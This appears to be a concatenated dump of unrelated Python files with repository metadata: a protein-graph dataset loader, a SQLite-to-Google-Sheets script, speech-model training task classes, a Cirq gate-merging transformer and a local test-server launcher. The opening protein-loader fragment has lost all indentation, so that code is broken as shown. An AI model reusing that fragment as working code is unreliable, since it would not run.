species_id = int(nx_node_ids[0].split('.')[0]) # nx node id is of the form:
# species_id.protein_id
species_id = torch.tensor([species_id], dtype=torch.long)
except: # occurs when nx node id has no species id info. For the extract
# substructure context pair transform, where we convert a data obj to
# a nx graph obj (which does not have original node id info)
species_id = torch.tensor([0], dtype=torch.long) # dummy species
# id is 0
# construct data obj
data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)
data.species_id = species_id
data.center_node_idx = center_node_idx
if node_id_to_go_labels: # supervised case with go node labels
# Construct a dim n_pretrain_go_classes tensor and a
# n_downstream_go_classes tensor for the center node. 0 is no data
# or negative, 1 is positive.
downstream_go_node_feature = [0] * len(allowable_features_downstream)
pretrain_go_node_feature = [0] * len(allowable_features_pretrain)
if center_id in node_id_to_go_labels:
go_labels = node_id_to_go_labels[center_id]
# get indices of allowable_features_downstream that match with elements
# in go_labels
_, node_feature_indices, _ = np.intersect1d(
allowable_features_downstream, go_labels, return_indices=True)
for idx in node_feature_indices:
downstream_go_node_feature[idx] = 1
# get indices of allowable_features_pretrain that match with
# elements in go_labels
_, node_feature_indices, _ = np.intersect1d(
allowable_features_pretrain, go_labels, return_indices=True)
for idx in node_feature_indices:
pretrain_go_node_feature[idx] = 1
data.go_target_downstream = torch.tensor(np.array(downstream_go_node_feature),
dtype=torch.long)
data.go_target_pretrain = torch.tensor(np.array(pretrain_go_node_feature),
dtype=torch.long)
return data
def graph_data_obj_to_nx(data):
"""
Converts pytorch geometric Data obj to network x data object.
:param data: pytorch geometric Data object
:return: nx graph object
"""
G = nx.Graph()
# edges
edge_index = data.edge_index.cpu().numpy()
edge_attr = data.edge_attr.cpu().numpy()
n_edges = edge_index.shape[1]
for j in range(0, n_edges, 2):
begin_idx = int(edge_index[0, j])
end_idx = int(edge_index[1, j])
w1, w2, w3, w4, w5, w6, w7, _, _ = edge_attr[j].astype(bool)
if not G.has_edge(begin_idx, end_idx):
G.add_edge(begin_idx, end_idx, w1=w1, w2=w2, w3=w3, w4=w4, w5=w5,
w6=w6, w7=w7)
# # add center node id information in final nx graph object
# nx.set_node_attributes(G, {data.center_node_idx.item(): True}, 'is_centre')
return G
class BioDataset(InMemoryDataset):
def __init__(self,
root,
data_type,
empty=False,
transform=None,
pre_transform=None,
pre_filter=None):
"""
Adapted from qm9.py. Disabled the download functionality
:param root: the data directory that contains a raw and processed dir
:param data_type: either supervised or unsupervised
:param empty: if True, then will not load any data obj. For
initializing empty dataset
:param transform:
:param pre_transform:
:param pre_filter:
"""
self.root = root
self.data_type = data_type
super(BioDataset, self).__init__(root, transform, pre_transform, pre_filter)
if not empty:
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
#raise NotImplementedError('Data is assumed to be processed')
if self.data_type == 'supervised': # 8 labelled species
file_name_list = ['3702', '6239', '511145', '7227', '9606', '10090', '4932', '7955']
else: # unsupervised: 8 labelled species, and 42 top unlabelled species by n_nodes.
file_name_list = ['3702', '6239', '511145', '7227', '9606', '10090',
'4932', '7955', '3694', '39947', '10116', '443255', '9913', '13616',
'3847', '4577', '8364', '9823', '9615', '9544', '9796', '3055', '7159',
'9031', '7739', '395019', '88036', '9685', '9258', '9598', '485913',
'44689', '9593', '7897', '31033', '749414', '59729', '536227', '4081',
'8090', '9601', '749927', '13735', '448385', '457427', '3711', '479433',
'479432', '28377', '9646']
return file_name_list
@property
def processed_file_names(self):
return 'geometric_data_processed.pt'
def download(self):
raise NotImplementedError('Must indicate valid location of raw data. '
'No download allowed')
def process(self):
raise NotImplementedError('Data is assumed to be processed')
if __name__ == "__main__":
root_supervised = 'dataset/supervised'
d_supervised = BioDataset(root_supervised, data_type='supervised')
print(d_supervised)
root_unsupervised = 'dataset/unsupervised'
d_unsupervised = BioDataset(root_unsupervised, data_type='unsupervised')
print(d_unsupervised)
| 41.037736 | 96 | 0.651724 | 1,194 | 8,700 | 4.511725 | 0.242044 | 0.014479 | 0.01188 | 0.012994 | 0.235753 | 0.179321 | 0.153703 | 0.128086 | 0.128086 | 0.098014 | 0 | 0.051147 | 0.258391 | 8,700 | 211 | 97 | 41.232227 | 0.783788 | 0.308506 | 0 | 0.084746 | 0 | 0 | 0.082715 | 0.004662 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059322 | false | 0 | 0.110169 | 0.008475 | 0.211864 | 0.016949 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a86b28ee1225866b03b3cc3e943f5eb90224441d | 2,857 | py | Python | query_output_to_gs.py | kburchfiel/google_sheets_database_connections | b60c49bbead9ddd6322b0b65e2cbfd3685188f21 | [
"MIT"
] | null | null | null | query_output_to_gs.py | kburchfiel/google_sheets_database_connections | b60c49bbead9ddd6322b0b65e2cbfd3685188f21 | [
"MIT"
] | null | null | null | query_output_to_gs.py | kburchfiel/google_sheets_database_connections | b60c49bbead9ddd6322b0b65e2cbfd3685188f21 | [
"MIT"
] | null | null | null | # Query Output to Google Slides
# Kenneth Burchfiel
# Program is released under the MIT License
'''This program shows how to upload the results of database queries to a Google
Sheets File. The program uses a sample SQLite database containing fictional
test score data; however, you can also connect to an online database using
SQLalchemy. See my Python Database Utilities repository (available at
https://github.com/kburchfiel/python_database_utilities) for examples.'''
'''More documentation will be provided in the future. I will probably also
convert the .py file to an .ipynb file for easier readability.'''
import sqlite3
import pandas as pd
import getpass
import gspread
from gspread_dataframe import set_with_dataframe
import time
con = sqlite3.connect('test_scores.db') # I initialized 'test.db' simply be creating an empty file in my folder and giving it that name.
df_scores = pd.read_excel('scores_by_program_enrollment.xlsx') # This idea for importing a spreadsheet into a DataBase came from Stack Overflow user Tennessee Leeuwenburg (see https://stackoverflow.com/a/28802613/13097194).
print(df_scores)
df_scores.to_sql('Scores', con = con, if_exists = 'replace') # See https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.to_sql.html
cur = con.cursor()
gc = gspread.service_account(pd.read_csv('..\\key_paths\\key_paths.csv').iloc[0,1])
query_list = []
query_list.append("Select * from Scores limit 5")
query_list.append("Select Student_ID, School, Grade from Scores limit 50")
query_dict_list = []
for i in range(len(query_list)):
query_dict_list.append({"query_id":"Query_"+str(i),"query_text":query_list[i]})
results_workbook = gc.open_by_key('1jPPz4YW5v5repoJXpXXJ3VrivK21lv1VYLvQIvTEyxE')
df_query_index = pd.DataFrame(query_dict_list)
print(df_query_index)
query_index_sheet = results_workbook.get_worksheet(0)
query_index_sheet.clear()
query_index_sheet_title = 'query_index'
query_index_sheet.update_title(query_index_sheet_title)
set_with_dataframe(query_index_sheet, df_query_index, include_index = True)
for i in range(len(query_list)):
start_time = time.time()
print("Now on Query",i)
df_query = pd.read_sql(sql = query_list[i], con = con) # This was a method I had originally learned about when converting database concent accessed through pyodbc to Pandas DataFrames. It works with sqlite3 databases also.
# print(df_query) # Helpful for debugging
query_sheet = results_workbook.get_worksheet(i+1) # A +1 offset is used because sheet 0 contains the index list.
query_sheet.clear()
query_sheet_title = 'Query_'+str(i)
query_sheet.update_title(query_sheet_title)
set_with_dataframe(query_sheet, df_query, include_index = True)
end_time = time.time()
length = end_time - start_time
print("Time operation took (in seconds):",'{:.3f}'.format(length))
| 40.814286 | 226 | 0.777039 | 439 | 2,857 | 4.851936 | 0.439636 | 0.046948 | 0.042254 | 0.019718 | 0.101878 | 0.050704 | 0.021596 | 0 | 0 | 0 | 0 | 0.014901 | 0.130907 | 2,857 | 69 | 227 | 41.405797 | 0.842932 | 0.370669 | 0 | 0.052632 | 0 | 0 | 0.185749 | 0.063946 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.026316 | 0.157895 | 0 | 0.157895 | 0.105263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a86f96505462e383f6c2341faddf2a1e85c4c268 | 9,562 | py | Python | fwks/tasks.py | Zantyr/fwks | 4dee4d406fcab4eb375afe6c9a08206fb58af061 | [
"MIT"
] | null | null | null | fwks/tasks.py | Zantyr/fwks | 4dee4d406fcab4eb375afe6c9a08206fb58af061 | [
"MIT"
] | null | null | null | fwks/tasks.py | Zantyr/fwks | 4dee4d406fcab4eb375afe6c9a08206fb58af061 | [
"MIT"
] | null | null | null | """
fwks.tasks
==========
Module responsible for scheduling the computations. Each type of task may be configured and then run in sequence.
Useful for creation of batches of jobs.
"""
__all__ = ["Task", "make_training_task", "make_ab_feature_test", "make_feature_learnability"]
import keras
import numpy as np
import os
import fwks.model as model
import fwks.dataset as dataset
import fwks.metricization as metricization
from fwks.miscellanea import StopOnConvergence
"""
TODO:
- saving // loading
- running the network
- creation of chains for language models
- test coverage
"""
class Task(type):
"""
Metaclass registering and running tasks.
"""
_instances = {}
@classmethod
def all(cls):
return [cls._instances[x] for x in sorted(cls._instances.keys())]
def __new__(self, name, bases, dct):
new_dct = {"name": name, "implemented": True}
new_dct.update(dct)
item = super().__new__(self, name, bases, new_dct)
self._instances[name] = item
return item
def make_training_task(
noise=None,
evaluation_metrics=None,
evaluation_selection=None,
):
"""
Factory of basic model training tasks
"""
# TODO: add training using noisy instead of clean
_evaluation_selection = evaluation_selection
class AbstractModelTraining(Task):
how_much = 9000
noise_gen = noise
epochs = 250
from_path = "datasets/clarin-long/data"
metrics = evaluation_metrics or []
evaluation_selection = _evaluation_selection
def __new__(self, name, bases, dct):
this = self
_metrics = self.metrics
_evaluation_selection = self.evaluation_selection
@classmethod
def get_dataset(self):
dset = dataset.Dataset(noise_gen=this.noise_gen)
dset.loader_adapter = "clarin"
dset.get_from(self.from_path)
return dset
@classmethod
def validate(self, cache):
return os.path.exists(os.path.join(cache, "model.zip"))
@classmethod
def run(self, cache):
try:
if not os.path.exists(cache):
os.mkdir(cache)
except:
pass
dset = self.get_dataset()
dset.select_first(self.how_much)
am = self.get_acoustic_model()
am.num_epochs = this.epochs
am.name = name
am.build(dset)
am.summary()
if self._metrics:
metric_obj = metricization.TrainedModelMetricization(am, self._metrics)
results = metric_obj.on_dataset(dset, partial=self._evaluation_selection)
results.summary()
am.save(os.path.join(cache, "model.zip"), save_full=True)
print("=" * 60)
print("Task done!\n")
@classmethod
def summary(self, cache, show=False):
try:
print(cache)
am = model.AcousticModel.load(os.path.join(cache, "model.zip"))
return am.summary(show=show)
except FileNotFoundError:
print("Cannot find the model archive - aborting")
new_dct = {"run": run, "validate": validate, "summary": summary,
"how_much": this.how_much, "get_dataset": get_dataset,
"_metrics": _metrics, "_evaluation_selection": _evaluation_selection}
new_dct.update(dct)
return super().__new__(self, name, bases, new_dct)
@classmethod
def add_metric(self, metric):
self.metrics.append(metric)
metaclass = AbstractModelTraining
return metaclass
AbstractModelTraining = make_training_task()
def make_ab_feature_test(noise_gen):
"""
Factory for tasks that compare feature transforms on clean and noisy recordings
"""
_noise_gen = noise_gen
class AbstractABTraining(Task):
how_much = 9000
noise_gen = _noise_gen
from_path = "datasets/clarin-long/data"
def __new__(self, name, bases, dct):
this = self
@classmethod
def get_dataset(self):
dset = dataset.Dataset(noise_gen=this.noise_gen)
dset.loader_adapter = "clarin"
dset.get_from(self.from_path)
return dset
@classmethod
def validate(self, cache):
pass
@classmethod
def run(self, cache):
try:
if not os.path.exists(cache):
os.mkdir(cache)
except:
pass
dset = self.get_dataset()
dset.select_first(self.how_much)
am = self.get_acoustic_model()
mapping_generator = model.MappingGenerator(am.stages)
mapping = mapping_generator.get(dset)
dset.generate(mapping, ["clean", "noisy"])
print("Shape of the data: {}".format(dset.clean.shape))
metric_obj = metricization.MetricizationAB([
metricization.CosineMetric(),
metricization.EuclidMetric(),
metricization.ManhattanMetric()
])
diff = (dset.clean - dset.noisy)
metric_obj.calculate(
dset.clean, dset.clean_lens,
dset.noisy, dset.noisy_lens
)
metric_obj.summary()
print("=" * 60)
print("Task done!\n")
@classmethod
def summary(self, cache, show=False):
pass
new_dct = {"run": run, "validate": validate, "summary": summary,
"how_much": this.how_much, "get_dataset": get_dataset}
new_dct.update(dct)
return super().__new__(self, name, bases, new_dct)
return AbstractABTraining
def make_feature_learnability(noise_gen=None):
"""
Create a task that uses secondary neural network to learn the feature transform used by the first
"""
_noise_gen = noise_gen
class FeatureLearnabilityTask(Task):
"""
classmethods:
get_mapping
get_mapper_network(mapping_size)
"""
how_much = 9000
noise_gen = _noise_gen
from_path = "datasets/clarin-long/data"
def __new__(self, name, bases, dct):
this = self
@classmethod
def get_dataset(self):
dset = dataset.Dataset(noise_gen=this.noise_gen)
dset.loader_adapter = "clarin"
dset.get_from(self.from_path)
return dset
@classmethod
def validate(self, cache):
pass
@classmethod
def run(self, cache):
try:
if not os.path.exists(cache):
os.mkdir(cache)
except:
pass
dset = self.get_dataset()
dset.select_first(self.how_much)
am = self.get_mapping()
mapping_generator = model.MappingGenerator(am.stages)
mapping = mapping_generator.get(dset)
dset.generate(mapping, ["clean"])
clean = dset.clean
dset = self.get_dataset()
dset.select_first(self.how_much)
am = self.get_windowing()
mapping_generator_2 = model.MappingGenerator(am.stages)
mapping_2 = mapping_generator_2.get(dset)
dset.generate(mapping_2, ["clean"])
sources = dset.clean
# print(clean.shape)
# print(sources.shape)
mapper = self.get_mapper_network(sources.shape, clean.shape)
mapper.compile(loss='mse', optimizer='adam')
mapper.summary()
valid = np.random.random(sources.shape[0]) > 0.8
mapper.fit(sources[~valid], clean[~valid],
batch_size=32,
callbacks=[
keras.callbacks.TerminateOnNaN(),
StopOnConvergence(4)
],
validation_data=[sources[valid], clean[valid]],
epochs=250,
)
print("=" * 60)
print("Task done!\n")
@classmethod
def summary(self, cache, show=False):
pass
@classmethod
def get_windowing(self):
mdl = self.get_mapping()
return mdl.__class__([mdl.stages[0]])
new_dct = {"run": run, "validate": validate, "summary": summary,
"how_much": this.how_much, "get_dataset": get_dataset,
"get_windowing": get_windowing}
assert "get_mapping" in dct.keys()
assert "get_mapper_network" in dct.keys()
new_dct.update(dct)
return super().__new__(self, name, bases, new_dct)
return FeatureLearnabilityTask
FeatureLearnabilityTask = make_feature_learnability()
| 32.634812 | 113 | 0.535139 | 940 | 9,562 | 5.228723 | 0.209574 | 0.02767 | 0.017904 | 0.026043 | 0.446389 | 0.425229 | 0.40061 | 0.388606 | 0.382503 | 0.382503 | 0 | 0.00586 | 0.37534 | 9,562 | 292 | 114 | 32.746575 | 0.81701 | 0.060761 | 0 | 0.524272 | 0 | 0 | 0.058333 | 0.013813 | 0 | 0 | 0 | 0.006849 | 0.009709 | 1 | 0.106796 | false | 0.033981 | 0.033981 | 0.009709 | 0.291262 | 0.043689 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8707d1875735a5327cfd6fbf7ae8923132b4dfc | 4,390 | py | Python | cirq-core/cirq/transformers/merge_k_qubit_gates.py | LLcat1217/Cirq | b88069f7b01457e592ad69d6b413642ef11a56b8 | [
"Apache-2.0"
] | 1 | 2022-02-05T22:17:39.000Z | 2022-02-05T22:17:39.000Z | cirq-core/cirq/transformers/merge_k_qubit_gates.py | LLcat1217/Cirq | b88069f7b01457e592ad69d6b413642ef11a56b8 | [
"Apache-2.0"
] | 4 | 2022-01-16T14:12:15.000Z | 2022-02-24T03:58:46.000Z | cirq-core/cirq/transformers/merge_k_qubit_gates.py | LLcat1217/Cirq | b88069f7b01457e592ad69d6b413642ef11a56b8 | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Transformer pass to merge connected components of k-qubit unitary operations."""
from typing import cast, Optional, Callable, TYPE_CHECKING
from cirq import ops, protocols, circuits
from cirq.transformers import transformer_api, transformer_primitives
if TYPE_CHECKING:
import cirq
def _rewrite_merged_k_qubit_unitaries(
circuit: 'cirq.AbstractCircuit',
*,
context: Optional['cirq.TransformerContext'] = None,
k: int = 0,
rewriter: Optional[Callable[['cirq.CircuitOperation'], 'cirq.OP_TREE']] = None,
merged_circuit_op_tag: str = "_merged_k_qubit_unitaries_component",
) -> 'cirq.Circuit':
deep = context.deep if context else False
def map_func(op: 'cirq.Operation', _) -> 'cirq.OP_TREE':
op_untagged = op.untagged
if (
deep
and isinstance(op_untagged, circuits.CircuitOperation)
and merged_circuit_op_tag not in op.tags
):
return op_untagged.replace(
circuit=_rewrite_merged_k_qubit_unitaries(
op_untagged.circuit,
context=context,
k=k,
rewriter=rewriter,
merged_circuit_op_tag=merged_circuit_op_tag,
).freeze()
).with_tags(*op.tags)
if not (protocols.num_qubits(op) <= k and protocols.has_unitary(op)):
return op
if rewriter:
return rewriter(
cast(circuits.CircuitOperation, op_untagged)
if merged_circuit_op_tag in op.tags
else circuits.CircuitOperation(circuits.FrozenCircuit(op))
)
return ops.MatrixGate(protocols.unitary(op)).on(*op.qubits)
return transformer_primitives.map_operations_and_unroll(
circuit, map_func, tags_to_ignore=context.tags_to_ignore if context else ()
).unfreeze(copy=False)
@transformer_api.transformer
def merge_k_qubit_unitaries(
circuit: 'cirq.AbstractCircuit',
*,
context: Optional['cirq.TransformerContext'] = None,
k: int = 0,
rewriter: Optional[Callable[['cirq.CircuitOperation'], 'cirq.OP_TREE']] = None,
) -> 'cirq.Circuit':
"""Merges connected components of unitary operations, acting on <= k qubits.
Uses rewriter to convert a connected component of unitary operations acting on <= k-qubits
into a more desirable form. If not specified, connected components are replaced by a single
`cirq.MatrixGate` containing unitary matrix of the merged component.
Args:
circuit: Input circuit to transform. It will not be modified.
context: `cirq.TransformerContext` storing common configurable options for transformers.
k: Connected components of unitary operations acting on <= k qubits are merged.
rewriter: Callable type that takes a `cirq.CircuitOperation`, encapsulating a connected
component of unitary operations acting on <= k qubits, and produces a `cirq.OP_TREE`.
Specifies how to merge the connected component into a more desirable form.
Returns:
Copy of the transformed input circuit.
Raises:
ValueError: If k <= 0
"""
if k <= 0:
raise ValueError(f"k should be greater than or equal to 1. Found {k}.")
merged_circuit_op_tag = "_merged_k_qubit_unitaries_component"
circuit = transformer_primitives.merge_k_qubit_unitaries_to_circuit_op(
circuit,
k=k,
tags_to_ignore=context.tags_to_ignore if context else (),
merged_circuit_op_tag=merged_circuit_op_tag,
deep=context.deep if context else False,
)
return _rewrite_merged_k_qubit_unitaries(
circuit,
context=context,
k=k,
rewriter=rewriter,
merged_circuit_op_tag=merged_circuit_op_tag,
)
| 39.196429 | 97 | 0.68451 | 549 | 4,390 | 5.296903 | 0.304189 | 0.034044 | 0.051582 | 0.061898 | 0.355227 | 0.303645 | 0.289546 | 0.26685 | 0.25447 | 0.218019 | 0 | 0.003892 | 0.23918 | 4,390 | 111 | 98 | 39.54955 | 0.866766 | 0.357631 | 0 | 0.358209 | 0 | 0 | 0.11769 | 0.057749 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044776 | false | 0 | 0.059701 | 0 | 0.19403 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a871fe49f3be965b2393582da37217fcede6d062 | 17,538 | py | Python | liveandletdie/__init__.py | LeOndaz/liveandletdie | 86e174eda1a3a1ab810d16d1e3a85d0aff13dc55 | [
"MIT"
] | null | null | null | liveandletdie/__init__.py | LeOndaz/liveandletdie | 86e174eda1a3a1ab810d16d1e3a85d0aff13dc55 | [
"MIT"
] | null | null | null | liveandletdie/__init__.py | LeOndaz/liveandletdie | 86e174eda1a3a1ab810d16d1e3a85d0aff13dc55 | [
"MIT"
] | null | null | null | from __future__ import print_function
import argparse
from datetime import datetime
import os
import re
import signal
import ssl
import subprocess
import sys
import tempfile
import time
from werkzeug.serving import make_ssl_devcert
# pylint: disable=wrong-import-order
try:
from urllib.parse import urlsplit, splitport
except ImportError:
from urllib2 import splitport
from urlparse import urlsplit
import requests
_VALID_HOST_PATTERN = r'\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}([:]\d+)?$'
class LiveAndLetDieError(BaseException):
pass
def _log(logging, message):
if logging:
print('LIVEANDLETDIE: {0}'.format(message))
def _validate_host(host):
if re.match(_VALID_HOST_PATTERN, host):
return host
else:
raise argparse.ArgumentTypeError('{0} is not a valid host!'
.format(host))
def split_host(host):
"""
Splits host into host and port.
:param str host:
Host including port.
:returns:
A ``(str(host), int(port))`` tuple.
"""
host, port = (host.split(':') + [None])[:2]
return host, int(port)
def check(server):
"""Checks whether a server is running."""
return server.check()
def live(app):
"""
Starts a live app in a separate process
and checks whether it is running.
"""
return app.live()
def start(*args, **kwargs):
"""Alias for :funct:`live`"""
live(*args, **kwargs)
def die(app):
"""
Starts a live app in a separate process
and checks whether it is running.
"""
return app.live()
def stop(*args, **kwargs):
"""Alias for :funct:`die`"""
die(*args, **kwargs)
def port_in_use(port, kill=False, logging=False):
"""
Checks whether a port is free or not.
:param int port:
The port number to check for.
:param bool kill:
If ``True`` the process will be killed.
:returns:
The process id as :class:`int` if in use, otherwise ``False`` .
"""
command_template = 'lsof -iTCP:{0} -sTCP:LISTEN'
process = subprocess.Popen(command_template.format(port).split(),
stdout=subprocess.PIPE)
headers = process.stdout.readline().decode().split()
if 'PID' not in headers:
_log(logging, 'Port {0} is free.'.format(port))
return False
index_pid = headers.index('PID')
index_cmd = headers.index('COMMAND')
row = process.stdout.readline().decode().split()
if len(row) < index_pid:
_log(logging, 'Port {0} is free.'.format(port))
return False
pid = int(row[index_pid])
command = row[index_cmd]
if pid and command.startswith('python'):
_log(logging, 'Port {0} is already being used by process {1}!'
.format(port, pid))
if kill:
_log(logging,
'Killing process with id {0} listening on port {1}!'
.format(pid, port))
os.kill(pid, signal.SIGKILL)
# Check whether it was really killed.
try:
# If still alive
kill_process(pid, logging)
# call me again
_log(logging,
'Process {0} is still alive! checking again...'
.format(pid))
return port_in_use(port, kill)
except OSError:
# If killed
return False
else:
return pid
def kill_process(pid, logging=False):
try:
_log(logging, 'Killing process {0}!'.format(pid))
os.kill(int(pid), signal.SIGKILL)
return
except OSError:
# If killed
return False
def _get_total_seconds(td):
"""
Fixes the missing :meth:`datetime.timedelta.total_seconds()`
method in Python 2.6
"""
# pylint: disable=invalid-name
return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) \
/ 10 ** 6
class Base(object):
"""
Base class for all frameworks.
:param str path:
Absolute path to app directory or module (depends on framework).
:param str host:
A host at which the live server should listen.
:param float timeout:
Timeout in seconds for the check.
:param str check_url:
URL where to check whether the server is running.
Default is ``"http://{host}:{port}"``.
:param bool logging:
Whether liveandletdie logs should be printed out.
:param bool suppress_output:
Whether the stdout of the launched application should be suppressed.
"""
_argument_parser = argparse.ArgumentParser()
def __init__(self, path, host='127.0.0.1', port=8001, timeout=10.0,
check_url=None, executable='python', logging=False,
suppress_output=True, **kwargs):
self.path = path
self.timeout = timeout
self.host = host
self.port = port
self.process = None
self.executable = executable
self.logging = logging
self.suppress_output = suppress_output
self.check_url = 'http://{0}:{1}'.format(host, port)
self.scheme = 'http'
if check_url:
self.check_url = self._normalize_check_url(check_url)
def create_command(self):
pass
@property
def default_url(self):
return '{0}://{1}:{2}'.format(self.scheme, self.host, self.port)
def _kill(self):
if self.process:
try:
os.killpg(self.process.pid, signal.SIGKILL)
except OSError:
self.process.kill()
self.process.wait()
def _normalize_check_url(self, check_url):
"""
Normalizes check_url by:
* Adding the `http` scheme if missing
* Adding or replacing port with `self.port`
"""
# TODO: Write tests for this method
split_url = urlsplit(check_url)
host = splitport(split_url.path or split_url.netloc)[0]
return '{0}://{1}:{2}'.format(self.scheme, host, self.port)
def check(self, check_url=None):
"""
Checks whether a server is running.
:param str check_url:
URL where to check whether the server is running.
Default is ``"http://{self.host}:{self.port}"``.
"""
if check_url is not None:
self.check_url = self._normalize_check_url(check_url)
response = None
sleeped = 0.0
now = datetime.now()
while not response:
try:
response = requests.get(self.check_url, verify=False)
except requests.exceptions.ConnectionError:
if sleeped > self.timeout:
self._kill()
raise LiveAndLetDieError(
'{0} server {1} didn\'t start in specified timeout {2} '
'seconds!\ncommand: {3}'.format(
self.__class__.__name__,
self.check_url,
self.timeout,
' '.join(self.create_command())
)
)
time.sleep(1)
sleeped = _get_total_seconds(datetime.now() - now)
return _get_total_seconds(datetime.now() - now)
def live(self, kill_port=False, check_url=None):
"""
Starts a live server in a separate process
and checks whether it is running.
:param bool kill_port:
If ``True``, processes running on the same port as ``self.port``
will be killed.
:param str check_url:
URL where to check whether the server is running.
Default is ``"http://{self.host}:{self.port}"``.
"""
pid = port_in_use(self.port, kill_port)
if pid:
raise LiveAndLetDieError(
'Port {0} is already being used by process {1}!'
.format(self.port, pid)
)
host = str(self.host)
if re.match(_VALID_HOST_PATTERN, host):
with open(os.devnull, "w") as devnull:
if self.suppress_output:
self.process = subprocess.Popen(self.create_command(),
stderr=devnull,
stdout=devnull,
preexec_fn=os.setsid)
else:
self.process = subprocess.Popen(self.create_command(),
preexec_fn=os.setsid)
_log(self.logging, 'Starting process PID: {0}'
.format(self.process.pid))
duration = self.check(check_url)
_log(self.logging,
'Live server started in {0} seconds. PID: {1}'
.format(duration, self.process.pid))
return self.process
else:
raise LiveAndLetDieError('{0} is not a valid host!'.format(host))
def start(self, *args, **kwargs):
"""Alias for :meth:`.live`"""
self.live(*args, **kwargs)
def die(self):
"""Stops the server if it is running."""
if self.process:
_log(self.logging,
'Stopping {0} server with PID: {1} running at {2}.'
.format(self.__class__.__name__, self.process.pid,
self.check_url))
self._kill()
def stop(self, *args, **kwargs):
"""Alias for :meth:`.die`"""
self.die(*args, **kwargs)
@classmethod
def _add_args(cls):
cls._argument_parser.add_argument('--liveandletdie',
help='Run as test live server.',
type=_validate_host,
nargs='?',
const='170.0.0.1:5000')
@classmethod
def parse_args(cls, logging=False):
"""
Parses command line arguments.
Looks for --liveandletdie [host]
:returns:
A ``(str(host), int(port))`` or ``(None, None)`` tuple.
"""
cls._add_args()
args = cls._argument_parser.parse_args()
if args.liveandletdie:
_log(logging, 'Running as test live server at {0}'
.format(args.liveandletdie))
return split_host(args.liveandletdie)
else:
return None, None
class WrapperBase(Base):
"""Base class for frameworks that require their app to be wrapped."""
def create_command(self):
return [
self.executable,
self.path,
'--liveandletdie',
'{0}:{1}'.format(self.host, self.port),
]
class Flask(WrapperBase):
def __init__(self, *args, **kwargs):
"""
:param bool ssl:
If true, the app will be run with ``ssl_context="adhoc"`` and the
schema of the ``self.check_url`` will be ``"https"``.
"""
self.ssl = kwargs.pop('ssl', None)
super(Flask, self).__init__(*args, **kwargs)
if self.ssl:
self.scheme = 'https'
@classmethod
def _add_args(cls):
super(Flask, cls)._add_args()
cls._argument_parser.add_argument('--ssl',
help='Run with "adhoc" ssl context.',
type=bool,
nargs='?',
default=False)
def create_command(self):
command = super(Flask, self).create_command()
if self.ssl is True:
command += ['--ssl=1']
return command
def check(self, check_url=None):
url = self.check_url if check_url is None else \
self._normalize_check_url(check_url)
if self.ssl:
url = url.replace('http://', 'https://')
super(Flask, self).check(url)
@classmethod
def wrap(cls, app):
"""
Adds test live server capability to a Flask app module.
:param app:
A :class:`flask.Flask` app instance.
"""
host, port = cls.parse_args()
ssl_context = None
if host:
if cls._argument_parser.parse_args().ssl:
try:
import OpenSSL # pylint: disable=unused-variable
except ImportError:
# OSX fix
sys.path.append(
'/System/Library/Frameworks/Python.framework/Versions/'
'{0}.{1}/Extras/lib/python/'
.format(sys.version_info.major, sys.version_info.minor)
)
try:
import OpenSSL # pylint: disable=unused-variable
except ImportError:
# Linux fix
sys.path.append(
'/usr/lib/python{0}.{1}/dist-packages/'
.format(sys.version_info.major, sys.version_info.minor)
)
try:
import OpenSSL # pylint: disable=unused-variable
except ImportError:
raise LiveAndLetDieError(
'Flask app could not be launched because the pyopenssl '
'library is not installed on your system!'
)
ssl_context = 'adhoc'
app.run(host=host, port=port, ssl_context=ssl_context)
sys.exit()
class GAE(Base):
def __init__(self, dev_appserver_path, *args, **kwargs):
"""
:param str dev_appserver:
Path to dev_appserver.py
"""
super(GAE, self).__init__(*args, **kwargs)
self.dev_appserver_path = dev_appserver_path
self.admin_port = kwargs.get('admin_port', 5555)
def create_command(self):
command = [
self.dev_appserver_path,
'--host={0}'.format(self.host),
'--port={0}'.format(self.port),
'--admin_port={0}'.format(self.admin_port),
'--skip_sdk_update_check=yes',
self.path
]
if self.dev_appserver_path.endswith(('.py', '.pyc')):
command = [self.executable] + command
return command
class WsgirefSimpleServer(WrapperBase):
def __init__(self, *args, **kwargs):
"""
:param bool ssl:
If true, the app will be run with ssl enabled and the
scheme of the ``self.check_url`` will be ``"https"``.
"""
